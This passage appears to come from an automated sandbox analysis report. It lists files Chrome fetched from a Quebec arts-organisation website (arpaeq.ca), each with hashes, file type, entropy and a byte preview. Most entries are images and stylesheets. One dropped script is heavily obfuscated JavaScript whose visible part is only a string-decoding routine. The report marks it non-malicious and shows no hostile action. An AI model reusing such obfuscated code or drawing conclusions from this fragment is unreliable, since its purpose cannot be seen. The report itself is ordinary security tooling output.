                  SHA-512:42A58527C51FC0B86908AA0F226A866E416CFAA2310FEE3C029B5D236663D84A2CC68607F6A8E300F28D7E992172E10156CD00B497551D415C8BD82F26E1C263
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM..........g..Vjopmdi7jDl7_jyrIgqF..(.bFBMD01000abe03000017060000040a0000b80a0000500b00003611000072170000251800000d190000bf1900006b230000....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."......................................................................................................................5u.....5z..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:dropped
                  Size (bytes):9934
                  Entropy (8bit):7.80626190778848
                  Encrypted:false
                  SSDEEP:
                  MD5:C42726972E49F49E3C925EE9CEAEA265
                  SHA1:488F2056FA5EFE58E606CA4B7B7E505669E3DE3D
                  SHA-256:6B47138C35EF1AC2125A00C2CE4F6098BFF3DC303FF1E1AC5434F5EB03CE7C86
                  SHA-512:AE8E7198512A627D72C82159C3762606A3C45B1D4DFC42D275807D1C429559B3C57FF13236E4A839FDAF54205BF054EC37C80966607CE37CF8D2D48AA2ECE532
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF..............Photoshop 3.0.8BIM..........g..sZyR7Hv3uXYQJBh9txS4..(.bFBMD01000ac10300004e060000d00a00007f0b0000600c00002b140000a21a0000571b00001f1c0000311d0000ce260000....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 1536 x 512, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):69803
                  Entropy (8bit):7.934392816874927
                  Encrypted:false
                  SSDEEP:
                  MD5:D311B161515368F7AE9A0ADECDF98DD3
                  SHA1:A0A276374A216673848C17B0DA9C595194C9B6F1
                  SHA-256:5AFFE7D2D7121E4B90862E556290925A2CA5B13ED9796F73DA1B11E4950EEB95
                  SHA-512:E85AA21DBB6E7FEF2ECF52DF364E5BA8D9C0EA6F13A0856FF254A8CC8F0D258A7E6BC183662603C5C20CA5C4813381733781F64B9E2968877A20D42788D35932
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2024/12/Patinage_Quebec-Logo_CSQ_SLN-FINAL-Couleur-e1731596854377-1536x512-1.png
                  Preview:.PNG........IHDR.............D..x....pHYs..........+.... .IDATx...{.].y.......k/..G...(...0..P....(...........7../.8d7....8.G{..!.........lY.1....a.B(.a..B.EQ)m.v...........%u.z..k..}.:...kuk....>..< """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""=.:}.".Y.fk.5.r`.C.._M.s.......^.v.....6....H)U......U......>4......c.~`/..m..m=a..i.$....J.W.V....K..Y.........p...f.6......)H...6...A.V;..l....s..R3.....x.k6.....0........x...8.l...m.Y.f.` .PS......!..c.......d..bK.l....0....}6.-..T.Q;....$I.~..y.{..[.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (5268)
                  Category:dropped
                  Size (bytes):234597
                  Entropy (8bit):5.549941143978411
                  Encrypted:false
                  SSDEEP:
                  MD5:E507D99D9898B3F64B96988204781DEF
                  SHA1:1B0C805EE612C04E15539F18F6030D42F8350401
                  SHA-256:0432B38086805223F75355D46ACFBF9A52DB4579D11242D10583AE46EF31E4CC
                  SHA-512:58DAF4D7EDC706A3490411943A1C051DE1B964A4035E2F1D6E11174C2773D0B5409E626FA2A2158E162C43A94E0B6A940B2CDCF9C5FEAB37C906B0D0C1A6EF35
                  Malicious:false
                  Reputation:unknown
                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":2,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":true,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_isEnabled":true,"vtp_autoAddressEnabled":true,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__ccd
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 200x200, components 3
                  Category:downloaded
                  Size (bytes):7592
                  Entropy (8bit):7.8777254145944715
                  Encrypted:false
                  SSDEEP:
                  MD5:65AA0E08EFB87E891D7D5F174252FC3C
                  SHA1:F0EC87D2E92FED6EE825E10C1749653EB39B3B1E
                  SHA-256:61D840CE87201074ABD7F5DB079713D72B021D055B3954032F2CAA03569DCFF4
                  SHA-512:375012EE30BEC5817A4760F694E6842280A98772D0B57B966A47989B591ECD6941C6272D0C1E4D7B6D300DBD3564FEF5AB4ADA0D459251FC4179C629DB465089
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/09/Les-Sylphides-Riviere-au-Renard.jpg
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......h..(.bFBMD0a000a6d01000059030000fa0500003b0600009f06000059090000cf0f00007d100000ef1000007f110000a81d0000....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".............................................................................*K.b...y.)...*.L.X&..T* .*L..W.m....y.y.`.Ce.H.L...SA..6.m..g...."..Y...Zc.I3-e.A.$.....1.>.v..t.x.G..V.&.D.ju.w-7 ...%..1(a...d.&[.L,6..6L........0R...+.M.....~~.....bV....2..k......fP.M...z#K3......|...:.....JZM......j.>...26.R.}Qe...>&u.2..@.,@.....a[cf|.cd....:.Xo.-.{.T......@.q.&..*CN.C.9#..x.g..S.....~......>g..4.......0.R..y....}\<...../.y.'.|]...-..Z.. .($.!h...Vx...^g'...v...L.f2. ...s..@..0..H.@.. ..@...?...(.......................1.. !A.".3.#$BC............b..e.....F....*...B.8B.Tp(V..D' ......(M.d...G.N.9++(..g .:.W.F..Yu.M=.r..p..8..<...]{..).._.)......W..n....k..p..^......[
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):11609
                  Entropy (8bit):4.956723275484165
                  Encrypted:false
                  SSDEEP:
                  MD5:426E8908D7426603CA203B6D16281B1E
                  SHA1:91F44576A5F5CCFF4740FF5020656BD2F00CA13C
                  SHA-256:A936ACF2B96BE0DF9B1E9A4714BD4C3FC23244953374A6E3447C6CF960941470
                  SHA-512:8CA670D9C84C99AC2C2CA4BA2773970E7EA0077F3C7FABB1E6A62D42B0C5A5FE69303662636AC96283CD12E72919591088E1DFEBA2129C4622F0D80FBC5FE0B6
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/default-skin/default-skin.css?ver=1.0
                  Preview:/*! PhotoSwipe Default UI CSS by Dmitry Semenov | photoswipe.com | MIT license */./*...Contents:...1. Buttons..2. Share modal and links..3. Index indicator ("1 of X" counter)..4. Caption..5. Loading indicator..6. Additional styles (root element, top bar, idle state, hidden state, etc.)..*/./*....1. Buttons.. */./* <button> css reset */..pswp__button {. width: 44px;. height: 44px;. position: relative;. background: none;. cursor: pointer;. overflow: visible;. -webkit-appearance: none;. display: block;. border: 0;. padding: 0;. margin: 0;. float: right;. opacity: 0.75;. -webkit-transition: opacity 0.2s;. transition: opacity 0.2s;. -webkit-box-shadow: none;. box-shadow: none; }. .pswp__button:focus,. .pswp__button:hover {. opacity: 1; }. .pswp__button:active {. outline: none;. opacity: 0.9; }. .pswp__button::-moz-focus-inner {. padding: 0;. border: 0; }../* pswp__ui--over-close class it added when mouse is over element that should close g
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (31625)
                  Category:dropped
                  Size (bytes):31726
                  Entropy (8bit):5.466659861613804
                  Encrypted:false
                  SSDEEP:
                  MD5:F5CD6479C4E4682545A9603E6B50C741
                  SHA1:E3267F5AE23F00C1AE052D019F12787296E34AFC
                  SHA-256:5299510ACF6FE0A5D526F558FA9F914A8E50E2294051787B9298F220FE687727
                  SHA-512:CD11B644BA5EEEEB72FCC48B6391DC687AED097EB4372D0FB9B63CABF16E79638359C04C20D3E2B2A7D07A75662418D7C4489126590E41C79B30EC94ED0D0E37
                  Malicious:false
                  Reputation:unknown
                  Preview:/*! PhotoSwipe - v4.1.1 - 2015-12-24.* http://photoswipe.com.* Copyright (c) 2015 Dmitry Semenov; */.!function(a,b){"function"==typeof define&&define.amd?define(b):"object"==typeof exports?module.exports=b():a.PhotoSwipe=b()}(this,function(){"use strict";var a=function(a,b,c,d){var e={features:null,bind:function(a,b,c,d){var e=(d?"remove":"add")+"EventListener";b=b.split(" ");for(var f=0;f<b.length;f++)b[f]&&a[e](b[f],c,!1)},isArray:function(a){return a instanceof Array},createEl:function(a,b){var c=document.createElement(b||"div");return a&&(c.className=a),c},getScrollY:function(){var a=window.pageYOffset;return void 0!==a?a:document.documentElement.scrollTop},unbind:function(a,b,c){e.bind(a,b,c,!0)},removeClass:function(a,b){var c=new RegExp("(\\s|^)"+b+"(\\s|$)");a.className=a.className.replace(c," ").replace(/^\s\s*/,"").replace(/\s\s*$/,"")},addClass:function(a,b){e.hasClass(a,b)||(a.className+=(a.className?" ":"")+b)},hasClass:function(a,b){return a.className&&new RegExp("(^|\\s)
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 172x172, components 3
                  Category:downloaded
                  Size (bytes):9318
                  Entropy (8bit):7.799389080633574
                  Encrypted:false
                  SSDEEP:
                  MD5:49C458C558873B6B128986B6AA29AD1A
                  SHA1:2021A9B3F7B1125BD6582AD70A81F82C25D6A860
                  SHA-256:A974E087A5E8CC37C7455C69FBCAC9762FAC2CDC3A25C2BC7A5C80D6460AC260
                  SHA-512:BDC17568F91AFEB6E9E6317FE9A064BC734D99D058375DD51481D8553ED5BA0441C8DBEB278571F5D9B8B659381729A530359923C0AF5023D0D57ABABEDB3667
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/la-pocatiere.jpg
                  Preview:......JFIF..............Photoshop 3.0.8BIM.......g..(.bFBMD01000aaa0300002e060000060a0000590c0000c40d0000061300003c180000ce180000c51a0000ef1b000066240000.....ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."............................................................................................................H. <..*.X,t...,tE..j.....L..=T..(...$......
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 398 x 86, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):7987
                  Entropy (8bit):7.930025677187103
                  Encrypted:false
                  SSDEEP:
                  MD5:5B48465A5B7AFEE5F4E22DB758EDB850
                  SHA1:9BA517D0C8EF08716FE4CAE48CAA4B1233737927
                  SHA-256:82BD00B4FEA50BAD4ADCA8E6EF458CD4F2801F0CA8129526473F9562A4A66C62
                  SHA-512:F1762399C44A373601B593969BEF4C6FE8E020572D6CD0A271C3BDA0382F8A60BFC24BE849345BB745DCF41F394F82654B9502CE5F6A58AF2D774A2A47B883E7
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR.......V.......q.....tEXtSoftware.Adobe ImageReadyq.e<...siTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2890c0b4-136c-435e-99ae-c62ffd000d8a" xmpMM:DocumentID="xmp.did:BA6E082AB02411E6B6B6D66E386E41A9" xmpMM:InstanceID="xmp.iid:BA6E0829B02411E6B6B6D66E386E41A9" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8a600967-770c-4b3e-800c-5db2d75680bb" stRef:documentID="xmp.did:2890c0b4-136c-435e-99ae-c62ffd000d8a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..:....VIDATx..]..V..np..W...w...8Q.%.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 200 x 200, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):18292
                  Entropy (8bit):7.976127288140125
                  Encrypted:false
                  SSDEEP:
                  MD5:F3BDA0943642A032C863E6D5D960475F
                  SHA1:4A58449B0A495F08085B9EDF245F029EEAD3CC49
                  SHA-256:7C756172F88C1FABF668D4B4AC69FA39075CF01A6DFC6EC71266AE92A430CF64
                  SHA-512:F827CEB0BF9280F0CB0F8528B1465A2B040B63220E670F605E5B267A093B1CBD08EF5AA7A67FBA9D4EED84FD546FA61DFD40C5233FCBFFBF31C8FCC858A54EE2
                  Malicious:false
                  Reputation:unknown
                  Preview:.PNG........IHDR.............":9....czTXtRaw profile type iptc..x.=....0....S0..~..q.(.......;.......98A..6..W..9..t-.z....)..H.[..^.*..(. ... .IDATx^.g@SI...{.@h..T)...(v.....be..V..........vp..e.!R...!....!..~.}..B......d.7..3g.s8....C..J@... R,..H.D.."..1,..K. R,..H.D.."......J.b..dgg_.v......C..=.P."F.l6..f3....f6..../!!.K.......=SPPX.x1......z..Gss.M.|}}W.Xq.......2.....b...>|.C!.@ .H....D.5.X,(........\]]=k........2......vvv555l6...m............zDC.p.b.>}..@ ....d..a.*EE..~......D....ikkc2.bbb..........B F.+.).p.........< ...4..@ hkk....'&///--]SS....._..D'''.....F.R%%%.....b0.......l6[ZZ..6......^.......................L. #%%....fW---[.n..........s........:j`` //O..._...-..E.X...B.....3en."<uuu...4.M.........Lf0.g.-//OLL|.......{kkk....dr^^...9..khhHJJ....9"..VrssW.Zu..^.x<.h..J.%}..l6.N.s8.6.M&.9.NYYYmmmcc..W[[[{.....`0222>...s.NCCCqq..7....wOJJ*===##......1..9994...)D......ttt.={......x}}}:.....J.p8.H|..yJJ.P.....+V.}........7o.l...@
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (22853), with no line terminators
                  Category:dropped
                  Size (bytes):22853
                  Entropy (8bit):5.136337328041884
                  Encrypted:false
                  SSDEEP:
                  MD5:B4B20F0810AD6FA0AF824B57A62AF8C0
                  SHA1:9FE7EC17477D65791EC7F8AD47CD40FD70E6E82B
                  SHA-256:5634EC296A426F1D66F836A6B39B6995F55F7089332D57262936F04D3143D956
                  SHA-512:342B28ACEA09BF8AB2A48010C9A8AC1610082F958C2CDE272BFF6058898BD8BD3E104231513E96D4929BA02BBFFBD3CD77E741FC13BDE5A9831D1A4CB86E748C
                  Malicious:false
                  Reputation:unknown
                  Preview:function _0xf84e(_0x431087,_0x4ecf5b){const _0xd2e6fd=_0xd2e6();return _0xf84e=function(_0xf84e18,_0x20fe65){_0xf84e18=_0xf84e18-0x191;let _0x23f78f=_0xd2e6fd[_0xf84e18];return _0x23f78f;},_0xf84e(_0x431087,_0x4ecf5b);}(function(_0x58b5d4,_0x5808c9){const _0x2895f3=_0xf84e,_0x4b78f3=_0x58b5d4();while(!![]){try{const _0x1e6e8f=parseInt(_0x2895f3(0x1c5))/0x1*(-parseInt(_0x2895f3(0x1cf))/0x2)+-parseInt(_0x2895f3(0x19d))/0x3+-parseInt(_0x2895f3(0x1ca))/0x4+parseInt(_0x2895f3(0x194))/0x5+parseInt(_0x2895f3(0x19c))/0x6*(-parseInt(_0x2895f3(0x1af))/0x7)+parseInt(_0x2895f3(0x193))/0x8*(-parseInt(_0x2895f3(0x1e5))/0x9)+-parseInt(_0x2895f3(0x1a0))/0xa*(-parseInt(_0x2895f3(0x19b))/0xb);if(_0x1e6e8f===_0x5808c9)break;else _0x4b78f3['push'](_0x4b78f3['shift']());}catch(_0x51378e){_0x4b78f3['push'](_0x4b78f3['shift']());}}}(_0xd2e6,0x56029),(function(_0x3b6ce7,_0x56f2){const _0x24c723=_0xf84e,_0x5aa395=_0x40a0,_0x60e0e6=_0x3b6ce7();while(!![]){try{const _0x2fe17b=-parseInt(_0x5aa395(0x111))/0x1+pars
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 900x873, components 3
                  Category:dropped
                  Size (bytes):59967
                  Entropy (8bit):7.929684891678261
                  Encrypted:false
                  SSDEEP:
                  MD5:C274E5ABA9E486FCD6254AACE3C414AD
                  SHA1:170F66D52D6424ABAE3662523228CABB48A0B651
                  SHA-256:14B92088BC96C6D69AD74C609259E80739A1D95F8DBC4C5ECA944B49B33BAEC6
                  SHA-512:A289AC86198821DF2E3785A4B1BDC4B7DD19AA4B0BA73709448745140042A4526AEAB1E84C0CD6623E5F648CBD528635019822CFB345237B7705ACAA45E0424A
                  Malicious:false
                  Reputation:unknown
                  Preview:......JFIF.....`.`.....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......i....".......................................................................................................~Fx......Vn;.g0............................................Y`.z-$...x............................................:_/..D`.........h:)........................................].y.M.........[.....l:............................................$d...w.....I...<8s..;.J3.m...1.|>......................................5...%..{".*......=e$...\~.|...^|8.?...F.M....V.......$y..\...........................................R..|8....O.h.....>.|xs....o..v}>......n.......................................>....S%.r{._....n<../...0......|.........??.g...................................c?.-..;../lk....]O......_.z.Lg].....?.>...>.........w....h..x9.(.6...................................k;.D}#.......W._Mvw..c...u.}...
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):1596
                  Entropy (8bit):5.3142980541447535
                  Encrypted:false
                  SSDEEP:
                  MD5:09CAF0061B8EA62097F39A46B4BC541F
                  SHA1:FB4AE0615434F8E309F4C35EBF2101B6F39BB0F8
                  SHA-256:60C2DEDA975AF64694EBDF53DA8A0939049D45C66C12B8216F6A1D4BBBB19AAE
                  SHA-512:97DD4F6AA39C5EFC382A2422E99D6B3B89348E5923BF2DCFF4755798B6E16458E34A6279C2C374503EAD61B1241381F0A5975248789361D52AA41BE6E0B2D885
                  Malicious:false
                  Reputation:unknown
                  URL:"https://fonts.googleapis.com/css?family=Sintony:400,700"
                  Preview:/* latin-ext */.@font-face {. font-family: 'Sintony';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sintony/v15/XoHm2YDqR7-98cVUET0tuu8o.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Sintony';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/sintony/v15/XoHm2YDqR7-98cVUETMtug.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Sintony';. font-style: normal;. font-weight: 700;. src: url(https://fonts.gstatic.com/s/sintony/v15/XoHj2YDqR7-98cVUGYgIr94JkwLp.woff2) format('woff2');. uni
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (592)
                  Category:downloaded
                  Size (bytes):13018
                  Entropy (8bit):5.030968589544584
                  Encrypted:false
                  SSDEEP:
                  MD5:4E99A55D216E622C9ED6B9708D8B8010
                  SHA1:47B665098E381E2C019A05DDB18A14C366FC5E43
                  SHA-256:CA64645C22680035ACDD8149902FDA928C381CAFBEAB0B628B5542A7323EE0E4
                  SHA-512:E8D7A4AB549C99D33813A4F60E640D07352285DF4A264A00BBDCF83830C8FACB725CF4CB391E53A4BC4FA4E8F0906BAC82BF7E27B350787BF7EAAF415A22CEC3
                  Malicious:false
                  Reputation:unknown
                  URL:https://netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css?ver=1.0
                  Preview:/*!. * Bootstrap v3.0.0. *. * Copyright 2013 Twitter, Inc. * Licensed under the Apache License v2.0. * http://www.apache.org/licenses/LICENSE-2.0. *. * Designed and built with all the love in the world @twitter by @mdo and @fat.. */...article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block;}.audio,canvas,video{display:inline-block;}.audio:not([controls]){display:none;height:0;}.[hidden]{display:none;}.html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;}.body{margin:0;}.a:focus{outline:thin dotted;}.a:active,a:hover{outline:0;}.h1{font-size:2em;margin:0.67em 0;}.abbr[title]{border-bottom:1px dotted;}.b,strong{font-weight:bold;}.dfn{font-style:italic;}.hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0;}.mark{background:#ff0;color:#000;}.code,kbd,pre,samp{font-family:monospace, serif;font-size:1em;}.pre{white-space:pre-wrap;}.q{quotes:"\201C" "\201D" "\2018" "\2019";}.small{font-size:80%;}.sub,sup{fo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 120x55, components 3
                  Category:downloaded
                  Size (bytes):3146
                  Entropy (8bit):7.682602318785086
                  Encrypted:false
                  SSDEEP:
                  MD5:8C1331729F93CF60DCC9697C478D47E3
                  SHA1:C70E6576C6B1E9E1ED039C8D3C62A198AE339DB4
                  SHA-256:4B60AFF8C6C436DE48F83944D6B9EBC4C03522D15F7DDF16B04592802030C9FB
                  SHA-512:ABA6DF37736FD9D4C86E1E8715EE0543123A122D721F1AE73CF05E4B98AC97D13B00AB2B8ED1C2447BF1EEEBA97F18E207EBF43BB54A74C8553ED1F6A1C2F8A0
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/uploads/sites/2/2017/07/CPA-Carleton-e1558492097458.jpg
                  Preview:......JFIF.....`.`.....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......7.x..".............................................................................k/=(.....+`..R..n28..F.~...zx..p.H....}YuF.A.*S;.c........B......(\C..c.u....G......Ae~.Tiq....w0-j.....P.{.....@.....!.........................................y.MzK"Y*..n;..L.@..Z2C.M.._...S+.D..ih*...L..(.4FH@C....'$..V%...z.n..}g.1C....t'7.6........|[V...Z.m..d..../.^.+/,.c.?Z.(.....Zz..Q..1..~.W.Z#...dv}GQ.].$....H."K.5m..^.\.tQ.>..."...S.c...'W......".A..hKp..V..e..p.l....d....!.5...+.....9.P..f.``&..^.J.-..Y..aZa.#lI..........&\2a)`........X.....T.s...gP...o!P.F....L .!W........................... 01@A........?... 2g...C......................... 0@........?...2.#....7........................!.1A.."2a3BQq.4CRr.. #$b.............?.i.M ^x......Z..E.dr\...W.,...Z=4.>$..d..azX..G,.xk....!...~.%.Y.8...y..J.9....*.X..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):831
                  Entropy (8bit):4.998977008753509
                  Encrypted:false
                  SSDEEP:
                  MD5:C57F9C85C1FC073F6288287386323195
                  SHA1:55546835A525873D4153E05BED134E37EEF0BB3F
                  SHA-256:544FAE5FEBBD7760CDEA8DAA23EA07B9D6849B5E434517DE4EE7B35CD594390B
                  SHA-512:4633CB592CAE13BE645643B532E08FCAC63E61FACDA668762EB6A6F87CB3B5042DBE5B807ACA2E88874AAF6FBB76A58E667A81DB8AFDC3D3C5729692046A3DF0
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/liMarquee.css?ver=1.0
                  Preview:/*Plugin CSS*/..str_wrap {..overflow:hidden;..//zoom:1;..width:100%;..font-size:12px;..line-height:16px;..position:relative;..-moz-user-select: none;..-khtml-user-select: none;..user-select: none; ..background:#f6f6f6;..white-space:nowrap;.}...str_wrap.str_active {..background:#f1f1f1;.}..str_move { ..white-space:nowrap;..position:absolute; ..top:0; ..left:0;..cursor:move;.}..str_move_clone {..display:inline-block;..//display:inline;..//zoom:1;..vertical-align:top;..position:absolute; ..left:100%;..top:0;.}..str_vertical .str_move_clone {..left:0;..top:100%;.}..str_down .str_move_clone {..left:0;..bottom:100%;.}..str_vertical .str_move,..str_down .str_move {..white-space:normal;..width:100%;.}..str_static .str_move,..no_drag .str_move,..noStop .str_move{..cursor:inherit;.}..str_wrap img {..max-width:none !important;..}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):137248
                  Entropy (8bit):4.7468526679279535
                  Encrypted:false
                  SSDEEP:
                  MD5:85D7647E6E5E2E1FB45CD21BEACD1BC5
                  SHA1:A70915A64E8521628867FD5D333A4163127B4602
                  SHA-256:77053420BF34C68A01097F03EEC7B108E0112D32EAF23ED6176959CF7B0D0B8B
                  SHA-512:D34DE44A3769E8C3601EA064480598E557C6036234E29DE96B5C602F62BD23CBF8956EC299BA99EE8DAD75C6C552B27FC54C19EAAFE84E5D5925884FDCAFE639
                  Malicious:false
                  Reputation:unknown
                  URL:https://arpaeq.ca/wp-content/themes/iron-man/ressources/stylesheets/nucleo-outline.css?ver=1.0
                  Preview:/* --------------------------------..Nucleo Outline Web Font - nucleoapp.com/.License - nucleoapp.com/license/.Created using IcoMoon - icomoon.io..-------------------------------- */.@font-face {. font-family: 'Nucleo Outline';. src: url('../fonts/nucleo-outline.eot');. src: url('../fonts/nucleo-outline.eot') format('embedded-opentype'), url('../fonts/nucleo-outline.woff2') format('woff2'), url('../fonts/nucleo-outline.woff') format('woff'), url('../fonts/nucleo-outline.ttf') format('truetype'), url('../fonts/nucleo-outline.svg') format('svg');. font-weight: normal;. font-style: normal;.}./*------------------------..base class definition.-------------------------*/..nc-icon-outline {. display: inline-block;. font: normal normal normal 14px/1 'Nucleo Outline';. font-size: inherit;. speak: none;. text-transform: none;. /* Better Font Rendering */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./*------------------------. change icon size.-------
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 840x787, components 3
                  Category:downloaded
